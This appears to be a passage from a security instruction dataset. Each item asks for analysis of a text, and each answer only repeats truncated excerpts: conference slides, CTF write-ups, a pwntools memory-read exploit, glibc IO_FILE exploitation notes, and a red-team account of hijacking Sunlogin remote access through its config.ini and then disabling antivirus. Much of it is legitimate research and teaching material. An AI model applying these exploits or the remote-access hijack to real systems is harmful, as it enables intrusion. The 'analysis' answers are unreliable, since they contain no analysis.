Decoupled+systems+reduced+single+points+of+failure  Good+- Compromise+of+one+service+doesnt+(always)+mean+full+pwnage  Bad+- Fast+release+sometimes+means+hasty+oversights  Bad+- Automated+Deployment+systems+are+checked+less+than+the+code+ that+they+deploy+  Bad+ Identity+management Tools Build1Systems  Take+code+and+build+conditionally  Typically+in+a+quasi+containerized+type+of+environment  Both+local+and+cloud+based+are+popular  Vendor: ØTravis-CI ØCircle-CI ØDrone ØTeamCity ØBuildKite Build1Systems  Take+code+and+build+conditionally  Typically+in+a+quasi+containerized+type+of+environment  Both+local+and+cloud+based+are+popular  Vendor: ØTravis-CI ØCircle-CI ØDrone ØTeamCity ØBuildKite Deployment1System", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLet's Dance in the Cache: Orange Tsai Destabilizing Hash Table on Microsoft IIS USA 2022 For a Protected Area Th1s-1s-@-Sup3r-Str0ng-P@33w0rD! DI1D8XF4 T9433W0N R04K85R8 OR7SHSQM 4IDF7LAU T9ILKRJO DIO376UC 29WM5WPU XRXNHYS8 I0XVSRY7 4J4F29DY BA55FF5B VJ5QUDCJ XS9B66QE I1BICTG1 DJH24HH4 OSNADCSM FSNPV263 91T4TLRP 91UKBHBR 2AWCRJ5Z I212PEZ3 XT2A3HD6 MK4CSS3L OT844EAG 92D4O9UT FTM3BRCO FTNJ0N3Q 4KT30N6F 92TWJEJM OU131W48 KC4U2MRT VL62A63D 93DWE2MQ OUFLIRN9 MLK1OC5L VLKKY1ME 2CONWY0F 03R2ZXJM AND MORE DI1D8XF4 T9433W0N R04K85R8 OR7SHSQM 4IDF7LAU T9ILKRJO DIO376UC 29WM5WPU XRXNHYS8 I0XVSRY7 4J4F29DY BA55FF5B VJ5QUDCJ XS9B66QE I1BICTG1 DJH24HH4 OSNADCSM FSNPV263 91T4TLRP 91UKBHBR 2AWCRJ5Z I212PEZ3 XT2A3HD6 MK4CSS3L OT844EAG 92D4O9UT FTM3BRCO FTNJ0N3Q 4KT30N6F 92TWJEJM OU131W48 KC4U2MRT VL62A63D 93DWE2MQ OUFLIRN9 MLK1OC5L VLKKY1ME 2CONWY0F 03R2ZXJM AND MORE All Passwords are Valid Orange Tsai  Specialize in Web and Application Vulnerability Research  Principal Security Researcher of DEVCORE  Speaker at Conferences: Black Hat USA/ASIA, DEFCON, HITB AMS/GSEC, POC, CODE BLUE, Hack.lu, WooYun and HITCON  Former Captain of HITCON CTF Team  Selected Awards and Honors:  2017 - 1st place of Top 10 Web Hacking Techniques  2018 - 1st place of Top 10 Web Hacking Techniques  2019 - Winner of Pwnie Awards \"Best Server-Side Bug\"  2021 - Champion and \"Master of Pwn\" of Pwn2Own  2021 - Winner of Pwnie Awards \"Best Server-Side Bug\" Outline 1. Introduction 2. Our Research 3. Vulnerabilities 4. Recommendations Hash Table The most underlying Data Structure in Computer Science Hold Data # Create a Hash Table Table = { \"one\": \"apple\", \"two\": \"banana\", } Table[\"three\"] = \"lemon\" Table[\"four\"] = \"orange\" delete Table[\"two\"] What is Hash-Flooding Attack? Drop all records into a same bucket Degenerate the Hash Table to a single Linked-List 00 banana 01 lemon 02 orange   13 apple 14 mango 15 QIH5VQ 7TZUCP KJNT08 MN6RJL TJDI4X Key Set Buckets 00 01 02 03 04 05  25 26 27 28 29 30 31 HASH FUNCTION H(KE", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#!/usr/bin/python2 import Crypto.Cipher.AES from pwn import * def exploit(connection): # Vulnerability # # The remote server allows for encrypting chunks of process memory. # Location of each chunk to be encrypted is provided by the client as # offset relative to fixed location within data section of the main # executable. The provided offsets are used without any validation, so we # are able to encrypt arbitrary memory location within the server process. # # Note that the encryption key is not exposed to the client. However after # each encryption operation, copy of ciphertext is sent to the client. libc = ELF(\"libc.so.6\") def run_encrypt(offset, size): connection.recvuntil(\"offset:\") connection.send(\"{:d}\\n\".format(offset)) connection.recvuntil(\"size:\") connection.send(\"{:d}\\n\".format(size)) response = connection.recvn((size & ~ 0x0f) + 0x10) return response # Step 1: Obtain fresh key and IV # # Run encryption over current (unknown) key and IV, so fresh key and IV # are generated and their copy is sent to the client. ciphertext = run_encrypt(-0x20, 0x1f) key = ciphertext[: 0x10] iv = ciphertext[0x10: 0x20] # Step 2: Leak address of executable # # Run encryption over `__dso_handle` and decrypt received ciphertext. ciphertext = run_encrypt(-0x3a0, 0x0f) cipher = Crypto.Cipher.AES.new(key, mode=Crypto.Cipher.AES.MODE_CBC, IV=iv) plaintext = cipher.decrypt(ciphertext) dso_handle_address = u64(plaintext[8: 0x10]) info(\"dso_handle_address = %012x\", dso_handle_address) main_address = dso_handle_address - 0x202008 info(\"main_address = %012x\", main_address) # Step 3: Define arbitrary memory read primitive # # Note that this primitive modifies (destroys) any read memory. base_address = main_address + 0x2023a0 info(\"base_address = %012x\", base_address) def read_memory(target_address, size): ciphertext = run_encrypt(target_address - base_address, size) cipher = Crypto.Cipher.AES.new(key, mode=Crypto.Cipher.AES.MODE_CBC, IV=iv) plaintext = cipher.decrypt(ciphertext) return pla", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBypassing All Bypassing All Web Application Firewalls Web Application Firewalls OuTian <outian@chroot.org> Agenda Agenda  Introduction  What is WAF  Why need WAF  What does WAF do  How to Bypass WAF  Q & A Introduction Introduction  近年來許多企業開始意識到傳統的資安設 備無法防護針對 Web 應用程式的攻擊  因此紛紛開始佈署Web Application Firewall以下簡稱WAF  本主題要強調的是WAF並不是萬靈藥 絕對沒有 100% 的防禦能力不要再聽 信沒有根據的謠言了  在設定不當的情況下有裝跟沒裝一樣  傳說中只要拔到獅子的鬃毛  聽說只要裝了 WAF就可以 萬無一失哦 About Me  OuTian < outian@chroot.org >  會唸的人叫我 ㄠˋ ㄊㄧㄢ  不會唸的人叫我黑糖凹臀熬湯  現任  敦陽科技 資安服務處 資安顧問  經歷   HIT2007  Implementation of Web Application Firewall  HIT2007/2008 0day Advisory  專長   滲透測試資安設備佈署  DDoS攻擊與防護資安事件緊急應變 What is WAF  深入解析HTTPHTMLXML內容之  網路硬體設備  主機式軟體  處理 Client 與 Web Server 間之傳輸  用以防禦針對動態網頁應用程式之攻擊  避免內部之敏感訊息或資料外洩 WAF Vendors (in TW)  (廠牌) - (產品名稱)  AppliCure - dotDefender  Armorize - SmartWAF  Barracuda - Web Application Controller  Cisco - ACE  Citrix - NetScaler  F5 - Big-IP / ASM  Imperva - SecureSphere  Radware - AppWall  others  (以上依廠牌名稱排序) WAF Vendors (Global)  BeeWare  BinarySEC  Breach / ModSecurity  Deny All  Visonys  ... others 常見 Web 應用程式弱點 (1)  程式過濾不當  SQL Injection  竊取資料入侵網站  Cross Site Scripting  利用網站弱點竊取其他用戶資料  Arbitrary File Inclusion  入侵網站  Code/Command Injection  入侵網站  Directory Traversal  瀏覽敏感資訊檔案  Buffer Overflow  入侵網站主機 常見 Web 應用程式弱點 (2)  邏輯設計不良  Cookie Poisoning  變換身份提升權限  Parameter Tampering  竄改參數使應用程式出現不可預期反應  Upload File Mis-Handling  植入網站木馬  Information Disclosure  洩露網站資訊  Weak Authentication  脆弱的認證機制 WAF v.s IDP/IPS  網頁防火牆  Positive Security Model (正向表列白名單)  行為模式分析 Behavior Modeling  置入金鑰/憑證可解析 SSL封包  會追蹤表單/Cookie  入侵偵測系統  Negative Security Model (負向表列黑名單)  特表碼辨識 Signature based  無法解析 SSL 封包  不追蹤 表單/Cookie What does WAF do   Input Validation  Protocol  URL  Parameter  Cookie/Session  Output Checks  Protocol  Headers  Error Messages  Credit Card Number  Sensitive Information Input Validation Protocol URL Parameter  Normal HTTP Request GET /search?q=test HTTP/1.1 Accept: */* Accept-Language: zh-tw User-Agent: Mozilla/4.0 Accep", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## Fuzyll (Recon, 200p) ###ENG [PL](#pl-version) In the task we start off on page http://fuzyll.com/files/csaw2016/start to get a riddle: ``` CSAW 2016 FUZYLL RECON PART 1 OF ?: People actually liked last year's challenge, so CSAW made me do it again... Same format as last year, new stuff you need to look up. The next part is at /csaw2016/<the form of colorblindness I have>. ``` We could check the author twitter and reddit where he writes a bit about which colors he can't see, or we could brute-force this, either way the answer is `deuteranomaly`, and we get to next level. We get a [picture](deuteranomaly.png) and if we look inside with hexeditor we can see another riddle: ``` CSAW 2016 FUZYLL RECON PART 2 OF ?: No, strawberries don't look exactly like this, but it's reasonably close. You know what else I can't see well? /csaw2016/&lt;the first defcon finals challenge i ever scored points ``` We check on author blog and other sources to see which defcons should be consider and there brute-force the task name (good thing Fuzyll actually has nice listings on his github for all Defonc challenge names!), and we get the name `tomato`. This leads to another [file](tomato.bin) which we guess to be `ebdic` encoded, and from it we extract new riddle: ``` CSAW 2016 FUZYLL RECON PART 3 of ?: I don't even like tomatoes] Anyway, outside of CTFs, I've been playing a fair amount of World of WarCraft over the past year (never thought I'd be saying that after Cataclysm, but here we are). The next part is at /csaw2016/<my main WoW character's name>. ``` Quick googling to find Fuzyll's account on some WoW site and we get the name `elmrik`, and we get some custom-made ruby encryption: ```ruby #!/usr/bin/env ruby CHARS = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"B\", \"C\", \"D\", \"F\", \"G\", \"H\", \"J\", \"K\", \"L\", \"M\", \"N\", \"P\", \"Q\", \"R\", \"S\", \"T\", \"V\", \"W\", \"X\", \"Y\", \"Z\", \"b\", \"c\", \"d\", \"f\", \"g\", \"h\", \"j\", \"k\", \"l\", \"m\", \"n\", \"p\", \"q\", \"r\", \"s\", \"t\", \"v\", \"w\", \"x\", \"y\", \"z\"] def encod", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### .strtab: String Table介绍 该节区描述默认的字符串表包含了一系列的以 NULL 结尾的字符串ELF 文件使用这些字符串来存储程序中的符号名包括 - 变量名 - 函数名 该节在运行的过程中不需要加载只需要加载对应的子集 .dynstr 节 一般通过对字符串的首个字母在字符串表中的下标来索引字符串 字符串表的首尾字节都是NULL此外索引为 0 的字符串要么没有名字要么就是名字为空其解释依赖于上下文字符串表也可以为空相应的其节区头部的 sh_size 成员将为 0在空字符串表中索引大于 0 的下标显然是非法的 一个节区头部的 sh_name 成员的值为其相应的节区头部字符串表节区的索引此节区由 ELF 头的 e_shstrndx 成员给出下图给出了一个包含 25 个字节的字符串表以及与不同索引相关的字符串 | 索引 | +0 | +1 | +2 | +3 | +4 | +5 | +6 | +7 | +8 | +9 | | ---- | ---- | ---- | ---- | ---- | ---- | ---- | ---- | ---- | ---- | ---- | | 0 | \\0 | n | a | m | e | . | \\0 | V | a | r | | 10 | i | a | b | l | e | \\0 | a | b | l | e | | 20 | \\0 | \\0 | x | x | \\0 | | | | | | 其中包含的字符串有 | 索引 | 字符串 | | ---- | -------- | | 0 | none | | 1 | name. | | 7 | Variable | | 11 | able | | 16 | able | | 24 | 空字符串 | 可以看出 - 字符串表索引可以引用节区中任意字节 - 字符串可以出现多次 - 可以存在对子字符串的引用 - 同一个字符串可以被引用多次 - 字符串表中也可以存在未引用的字符串 这部分信息在进行 `strip` 后就会消失", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## QR Puzzle (Unknown, 200p) Please solve a puzzle 300 times QRpuzzle.zip ###PL [ENG](#eng-version) Dostajemy program, który wyświetla poszatkowane QR cody po uruchomieniu: ![](screen.png) Dość oczywisty jest cel zadania - należy napisać program który złoży taki QR code, rozwiąże go, oraz wyśle do programu. Moglibyśmy próbować go reversować, ale to wyraźnie co innego niż autorzy zadania zaplanowali dla nas, więc nie poszliśmy tą drogą. Napisaliśmy w tym celu pewien bardzo duży solver, który: - robił screena programu - wyciągał z niego poszczególne fragmenty - składał części w jedną (najtrudniejsza część oczywiśćie) - dekodował wynikowy QR code - wysyłał zdekodowany tekst do aplikacji - czekał 500 ms i powtarzał ten cykl. Kodu jest za dużo by omawiać go funkcja po funkcji, wklejona zostanie jedynie główna funkcja pokazująca te kroki ([pełen kod](Form1.cs)]: ```csharp while (true) { using (var bmp = CaptureApplication(\"QRpuzzle\")) { var chunks = Split( 18, 77, 160, 167, 6, 13, 3, bmp); var result = Bundle.Reconstruct(chunks, 3); var reader = new BarcodeReader { PossibleFormats = new[] { BarcodeFormat.QR_CODE }, TryHarder = true }; result.Save(\"Test2.png\"); var code = reader.Decode(result); SendKeys.Send(code.Text); Thread.Sleep(500); } } ``` Flaga: SECCON{402B00F89DC8} ### ENG version We get a program that displays scrambled QR codes when run: ![](screen.png) It's obvious what task authors want from us - we have to write program that unscrambles given QR code and sends it to program. Of course we could try to reverse engineer given program, but clearly task authors wanted us to solve challenge different way. We have written large solver, that: - captured program window to bitmap - cut all 9 qr code fragments to different bitmaps - put fragments in correct order (hardest part, by far) - decoded resulting QR code - sent decoded text to program - slept 500 ms and repeated that cycle Solver code is too large to be described function by function, so we will just paste main", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNo Key? No PIN? No Combo? No Problem! P0wning ATMs For Fun and Profit Roy Davis roydavis@roydavis.org @hack_all_things /in/roy-davis Why ATMs? https://www.youtube.com/watch?v=ZO956U10Zlc https://www.statista.com/statistics/741708/number-of-atms-worldwide/ https://bit.ly/3ySNvey Better World Through Hacking Barnaby Jack Westin Hecker Alexey Osipov Olga Kochetova Alexander Forbes Trey Keown Brenda So Blackhat Europe - 2014 DEF CON 24 - 2016 Disobey - 2019 DEF CON 18 - 2010 DEF CON 28 - 2020 Plore DEF CON 24 - 2016 Mike Davis DEF CON 27 - 2019 On tap   ATM Acquisition  Damage Inc.  Some general ATM info  Licensed to operate (and sniff traffic??)  Picking the ATM case lock  Resetting the admin password  Bypassing the Electronic Vault Lock  Q&A The Goal... Photo by Sarv Mithaqiyan Source: Trey Keown & Brenda So - DEF CON 28 How do ATMs work? Damage, Inc. Damage, Inc. Damage, Inc. Card Reader (mag / chip) Encrypting Pin Pad Touchscreen Receipt Dispense Cash Dispense Safe Door Cover Camera (optional) CPU Housing Vault Housing Electronic Vault lock keypad Lock Bolt Handle Power wire for door light Auth request with card info and PIN Payment Processing Host Card Issuing Bank TLS Encrypted Data Triton Protocol Approved Denied Approved Denied TLS Encrypted Data Protocol?? Internet Interbank ATM Licensing Outbound from ATM Inbound to ATM PPH https://bit.ly/3z4Azm2 CLEAR LEFT RIGHT CLEAR CLEAR CANCEL CLEAR LEFT RIGHT CLEAR CLEAR CANCEL https://www.youtube.com/watch?v=lXFpCV646E0&t=338s https://www.youtube.com/watch?v=lXFpCV646E0 https://www.youtube.com/watch?v=HxQUKAjq-7w To Keypad Lock bolt Forced down by front handle rotation Anti-force notch Vault handle force direction Spring Linchpin DC Motor Linchpin 17.7 Volts 6.22mm 2.95mm TODO: Follow up Research  ATM Wifi  Vault lock MiTM  ATM Software modifications  USB and SD Card fun  Internal Serial comms MiTM and replay  EPP deconstruction analysis (Warning ??) No Key? No Key? No PIN? No Key? No PIN? No Combo? No Key? No PIN? No Com", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n加密勒索軟體行為偵測 (以Mac OS X為例) Henry HITCON 2016 About Me  黃禹程 (Henry)  Developer at Verint  專長: Web Development  資安是興趣  Chroot成員 大綱  偵測模型  Mac OS X上用FUSE實作成果演示  實作說明  問題與討論  新專案RansomCare  結論 偵測模型 與平台無關 對勒索軟體的假設  世上只有兩種勒索軟體  覆寫型 (OVERWRITE): 加密並覆寫原檔  開檔型 (NEW_FILE): 產生新加密檔並刪除原檔  一定會保留檔案全部內容  只具一般使用者權限  [optional] 只關注某些檔案類型  Ex. docx, pptx, xlsx, pdf, png, jpg, ...... 對勒索軟體的假設 (continued)  覆寫型: 必覆寫全檔且檔案內容變質  MIME Type改變 (目前只採用此項)  相似度變低  Entropy變高  開檔型: 必讀取全檔且讀完會刪檔  進入點是readdir (列出某目錄下的檔案) 歸納執行路徑  覆寫型readdir  open  read all  write all  release (檔案變質)  開檔型readdir  open  read all  (write to somewhere)  unlink  對所有行程都追蹤這麼長的路徑很耗資源  利用白名單 合理的白名單  系統程式  在開啟選單中的程式  所開檔案副檔名不被關注  不是.docx, .pdf, .png, ...... 開啟選單 inspected process P monitored file F 偵測模型 DEMO - HANSOM Hansom - 用FUSE實作的Proof of Concept 實作說明 Hansom如何利用FUSE來偵測ransomware FUSE[1]  Filesystem in USErspace (OSX: osxfuse[2])  FUSE kernel module  libfuse[3] (library in userspace)  FUSE的kernel module把filesystem的操作請 求交由userspace的程式來作回應 圖解Hansom實作 例open 問題與討論 如何躲避偵測改進空間 inspected process P monitored file F 如何躲避偵測 檔 4. 把關鍵動作拆在不同process中 5. 把自己註冊到開啟清單 (需要高權限) 6. 放進系統目錄中 or 注射系統process 7. readdir完先把副檔名改掉再open 2. 不要關檔 改進空間及方向  偵測方式inline mode v.s. sniffer mode  FUSE的作法  Inline mode  Ransomware演化前可有效偵測  會影響系統效能 (syscall從kernel  user  kernel)  較理想的作法  從Kernel mode將關鍵行為事件傳回user mode判斷  判斷跟系統操作非同步  不影響系統穩定性  User mode: 監控honey file RANSOMCARE https://github.com/Happyholic1203/ransomcare OS X Windows TODO 結論 結論  本模型只看行為  與平台無關  該模型能偵測KeRanger及自製ransomwares  尚未在OSX外實驗  Ransomware會演化 勢必會有一番攻防  最頭痛的演化方向高權限DLL side loading等  知道盾的作法 也探討了矛的新切入角度  Inline mode penalty: 系統效能/穩定性  Sniffer mode penalty: 有些檔案會犧牲 誤判率較 高 Reference  [1] FUSE https://en.wikipedia.org/wiki/Filesystem_in_Userspace  [2] osxfuse https://osxfuse.github.io/  [3] libfuse https://github.com/libfuse/libfuse Related Works  Emsisoft Behavior Blocker (2015)  成功偵測20支ransomware (連結裡有demo)  CryptoDrop (IEEE ICDCS 2016)  成功偵測492個ransomware sample  Windows Kernel Driver  Indicators  Fil", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# glibc 2.24下 IO_FILE 的利用 ## 介绍 在2.24版本的glibc中全新加入了针对IO_FILE_plus的vtable劫持的检测措施glibc 会在调用虚函数之前首先检查vtable地址的合法性首先会验证vtable是否位于_IO_vtable段中如果满足条件就正常执行否则会调用_IO_vtable_check做进一步检查 ```C /* Check if unknown vtable pointers are permitted; otherwise, terminate the process. */ void _IO_vtable_check (void) attribute_hidden; /* Perform vtable pointer validation. If validation fails, terminate the process. */ static inline const struct _IO_jump_t * IO_validate_vtable (const struct _IO_jump_t *vtable) { /* Fast path: The vtable pointer is within the __libc_IO_vtables section. */ uintptr_t section_length = __stop___libc_IO_vtables - __start___libc_IO_vtables; uintptr_t ptr = (uintptr_t) vtable; uintptr_t offset = ptr - (uintptr_t) __start___libc_IO_vtables; if (__glibc_unlikely (offset >= section_length)) /* The vtable pointer is not in the expected section. Use the slow path, which will terminate the process if necessary. */ _IO_vtable_check (); return vtable; } ``` 计算 `section_length = __stop___libc_IO_vtables - __start___libc_IO_vtables;`紧接着会判断 vtable - __start___libc_IO_vtables 的 offset 如果这个 offset 大于 section_length ,即大于 `__stop___libc_IO_vtables - __start___libc_IO_vtables` 那么就会调用 `_IO_vtable_check()` 这个函数 ```C void attribute_hidden _IO_vtable_check (void) { #ifdef SHARED /* Honor the compatibility flag. */ void (*flag) (void) = atomic_load_relaxed (&IO_accept_foreign_vtables); #ifdef PTR_DEMANGLE PTR_DEMANGLE (flag); #endif if (flag == &_IO_vtable_check) return; /* In case this libc copy is in a non-default namespace, we always need to accept foreign vtables because there is always a possibility that FILE * objects are passed across the linking boundary. */ { Dl_info di; struct link_map *l; if (_dl_open_hook != NULL || (_dl_addr (_IO_vtable_check, &di, &l, NULL) != 0 && l->l_ns != LM_ID_BASE)) return; } #else /* !SHARED */ /* We cannot perform vtable validation in the static dlopen case because FILE * handles might be passed back and forth across the boundary. Therefore, we", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.TH TESTPARM 1 \"11 Nov 1999\" \"testparm 2.0.6\" .SH NAME testparm \\- 检查smb.conf配置文件的内部正确性 .PP .SH 总览 .PP testparm [-s] [-h] [-L servername] [configfilename] [hostname hostIP] .PP .SH 描述 .PP 此程序是samba套件的一部分 .PP testparm是个非常简单的程序用于检查smbd配置文件的内部正确性如果程序报告没有什么 问题那么你可以放心地使用这个配置文件并且smbd也会非常顺利地装入它 .PP 注意这并不保证配置文件中指定的服务可以获得或者如你所愿地那样进行操作 .PP 如果在它的命令上指定可选的主机名和主机IP地址的话测试程序将通过服务接口运行并报告是否 指定的主机可以访问每个服务 .PP 如果testparm在smb.conf文件中找到一个错误的话它会向调用程序返回退出代码1否则返回 退出代码0这样shell脚本可以测试testparm的输入 .PP .SH 选项 .PP .IP .IP \"\\fB-s\\fP\" 如果不带这个参数testparm将提示在列出服务名和服务定义项之间打一个回车 .IP .IP \"\\fB-h\\fP\" 列出用法信息 .IP .IP \"\\fB-L servername\\fP\" 对服务项名字设定%L这样的宏值对于测试包含这样的宏值的文件非常有用 .IP .IP \"\\fBconfigfilename\\fP\" 指定要检查的配置文件名如果不指定的话程序对默认的smb.conf文件进行检查 .IP .IP \"\\fBhostname\\fP\" 如果命令行带有这个参数时测试程序将检查smb.conf文件中的\\(lqhosts allow\\(rq和\\(lqhosts deny\\(rq参数用以测试这些IP地址对应的主机名是否可以访 问smbd服务器如果用这样的参数时hostIP参数也必须一并使用 .IP .IP \"\\fBhostIP\\fP\" 这个参数用于指定前面给出的主机名相对应的IP地址如上说述主机名参数和这个地址必须一并 使用 .PP .SH 相关文件 .PP smb.conf通常这是smbd使用的配置文件名 .SH 诊断 程序运行的结果将给出装入的配置文件是否正确的信息如果文件没有被装入时可能显示的是错误和警 告信息反之装入文件正确的话程序会在标准输出上列出所有可知的服务细节 .SH 版本 .PP 此手册页是针对samba套件版本2.0的 .SH 另见 .PP \\fBsmb\\&.conf (5)\\fP, \\fBsmbd (8)\\fP .PP .SH 作者 .PP samba软件和相关工具最初由Andrew Tridgell samba-bugs@samba.org创建samba现在由开发 组作为类似Linux内核开发采用的开放源代码计划方式来发展 .PP samba手册页最初由Karl Auer撰写它的源码已被转换成YODL(一种极好的开放源代码软件可以在 ftp://ftp.icce.rug.nl/pub/unix/处获得)格式并已由Jeremy Allison更新到samba2.0版本 .PP 请参见samba (7)查找如何获得一份完整的维护者列表以及如何提交错误报告及注解等等 .SH \"[中文版维护人]\" .B meaculpa <meaculpa@21cn.com> .SH \"[中文版最新更新]\" .B 2000/12/08 .SH \"[中国 Linux 论坛 man 手册页翻译计划]\" .BI http://cmpp.linuxforum.net", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n本作者Drunkmars次投稿赠送知识星球 最近在某地举攻防演练的时候进后台管理拿到了个webshell但是 tasklist /svc tasklist /svc 查 看进程360电脑管家赫然在列我的伙伴本来准备使注dll来达到上线cs多运动的效果 但是奈何中间出了点差错始终上不了线机缘巧合之下发现被控主机有个 SunloginClient.exe SunloginClient.exe 进程于是便有了下 0 x 0 1 初 探 0 x 0 1 初 探 进后台的过程就不说了这上传了个asp进到对主机whoami看个user权限 然后发 tasklist /svc tasklist /svc 放到进程查好家伙360+电脑管家的组合拳 这卡了很久因为标机器为 windows2008 r2 windows2008 r2 跟win10系统有点差别所以我的伙伴注 dll的时候是出些问题导致直接免杀上线直没有成功 中间这个资产就放了段时间到后我们实在找不出其他可以打的靶标之后我突发奇想的回来看 下进程翻下录这次有了新发现 先发现了 SunloginClient.exe SunloginClient.exe 这个进程这个进程我判断出来应该是向葵的进程 因为之前是直接上了个哥斯拉这个哥斯拉在访问D盘录下的件时是有乱码且没有权限 进去的所以当时就没有管这个件夹以为是user权限进不去这个件夹这次上了个单独 的asp之后发现了个向葵件夹进去个 config.ini config.ini 赫然在列这就很舒服了 360和电脑管家也是安装在d盘要不是这两个杀软上线打进内的时间可能会更快 0 x 0 2 进 展 0 x 0 2 进 展 0 x 0 2 进 展 0 x 0 2 进 展 向葵的配置件最重要的地有三处分别 为 encry_pwd encry_pwd  fastcode fastcode  fastcodehistory fastcodehistory encry_pwd encry_pwd 为本机验证码为密不可解密 fastcode fastcode 为本机识别码为明 fastcodehistory fastcodehistory 为本机识别码历史为密base64解密即可如果你的向葵从来没有 连接过别的主机 fastcodehistory fastcodehistory 就为空 为什么说这个东西是向葵件最重要的呢先要了解向葵的验证机制当只输伙伴识别码 不输验证码时是需要对主机同意后才能远程控制电脑的 当识别码和验证码都输正确的情况下就不需要验证就可直接进对桌并进操作这可以理 解为输验证码正确就去掉了个UAC过程 0 x 0 3 复 现 0 x 0 3 复 现 知道原理过后我也没有贸然就去直接动谁也不会保证在过程中会出些其他的什么错误所以我 为了保险这在本地的两台虚拟机先进实验 攻击机192.168.10.3 被攻击机192.168.10.4 为了尽可能的还原主机环境我特意为被攻击机装上了360打开向葵如下图所 攻击机打开向葵如下图所 先我试着把我攻击机的验证码所对应的密修改到被攻击机的 config.ini config.ini 件中 先看下被攻击机原本的验证码 这我把攻击机的验证码直接改到被攻击机的 config.ini config.ini 上这我已经改了但是发现本机验证 码没有反应 因为是本地环境我试着重启下发现本机验证码才会跟攻击机的验证码相同 这有个重点如果要更改被攻击机的验证码就必须要被攻击机端的向葵重启才但是这个地 有两个问题是我拿到的webshell只是user权限是我查看了向葵的进程为system权 限如果在命令直接taskkill它的pid应该是不能结束的 这被攻击机上更换验证码后需要重启权限不够但是验证码重启之后确实是更攻击机上样那么我 想了下能不能把被攻击机上的验证码放到攻击机上来呢 这其实跟流量代理部分的思想差不多正向代理不了的情况下使反向代理 先更新下被攻击机的验证码复制 encry_pwd=wdtEBc/PIxU= encry_pwd=wdtEBc/PIxU= 复制到攻击机的encry_pwd的位置如图所 重启后发现本机验证码已经变为了被攻击机的验证码这时候就可以被攻击机的识别码和验证码去直 接连接主机的远程桌了上去之后直接简单粗暴关掉360 0 x 0 4 实 战 0 x 0 4 实 战 0 x 0 4 实 战 0 x 0 4 实 战 这我先把靶机的 config.ini config.ini 下载回本地 然后修改我的encry_pwd为靶机的encry_pwdfastcode连接 直接点击远程协助终于到了庐真 进之后发现他好像正在看任务管理器本来常规应该是先 quser quser 查看在线情况的这 quser", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nvi === 功能强大的纯文本编辑器 ## 补充说明 **vi命令** 是UNIX操作系统和类UNIX操作系统中最通用的全屏幕纯文本编辑器Linux中的vi编辑器叫vim它是vi的增强版vi Improved与vi编辑器完全兼容而且实现了很多增强功能 vi编辑器支持编辑模式和命令模式编辑模式下可以完成文本的编辑功能命令模式下可以完成对文件的操作命令要正确使用vi编辑器就必须熟练掌握着两种模式的切换默认情况下打开vi编辑器后自动进入命令模式从编辑模式切换到命令模式使用esc键从命令模式切换到编辑模式使用AaOoIi键 vi编辑器提供了丰富的内置命令有些内置命令使用键盘组合键即可完成有些内置命令则需要以冒号开头输入常用内置命令如下 ```shell Ctrl+u向文件首翻半屏 Ctrl+d向文件尾翻半屏 Ctrl+f向文件尾翻一屏 Ctrl+b向文件首翻一屏 Esc从编辑模式切换到命令模式 ZZ命令模式下保存当前文件所做的修改后退出vi :行号光标跳转到指定行的行首 :$光标跳转到最后一行的行首 x或X删除一个字符x删除光标后的而X删除光标前的 D删除从当前光标到光标所在行尾的全部字符 dd删除光标行正行内容 ndd删除当前行及其后n-1行 nyy将当前行及其下n行的内容保存到寄存器中其中为一个字母n为一个数字 p粘贴文本操作用于将缓存区的内容粘贴到当前光标所在位置的下方 P粘贴文本操作用于将缓存区的内容粘贴到当前光标所在位置的上方 /字符串文本查找操作用于从当前光标所在位置开始向文件尾部查找指定字符串的内容查找的字符串会被加亮显示 字符串文本查找操作用于从当前光标所在位置开始向文件头部查找指定字符串的内容查找的字符串会被加亮显示 abs/F/T替换文本操作用于在第a行到第b行之间将F字符串换成T字符串其中s/表示进行替换操作 a在当前字符后添加文本 A在行末添加文本 i在当前字符前插入文本 I在行首插入文本 o在当前行后面插入一空行 O在当前行前面插入一空行 :wq在命令模式下执行存盘退出操作 :w在命令模式下执行存盘操作 :w在命令模式下执行强制存盘操作 :q在命令模式下执行退出vi操作 :q在命令模式下执行强制退出vi操作 :e文件名在命令模式下打开并编辑指定名称的文件 :n在命令模式下如果同时打开多个文件则继续编辑下一个文件 :f在命令模式下用于显示当前的文件名光标所在行的行号以及显示比例 :set number在命令模式下用于在最左端显示行号 :set nonumber在命令模式下用于在最左端不显示行号 ``` ### 语法 ```shell vi(选项)(参数) ``` ### 选项 ```shell +<行号>从指定行号的行开始显示文本内容 -b以二进制模式打开文件用于编辑二进制文件和可执行文件 -c<指令>在完成对第一个文件编辑任务后执行给出的指令 -d以diff模式打开文件当多个文件编辑时显示文件差异部分 -l使用lisp模式打开lisp和showmatch -m取消写文件功能重设write选项 -M关闭修改功能 -n不实用缓存功能 -o<文件数目>指定同时打开指定数目的文件 -R以只读方式打开文件 -s安静模式不现实指令的任何错误信息 ``` ### 参数 文件列表指定要编辑的文件列表多个文件之间使用空格分隔开 ## 知识扩展 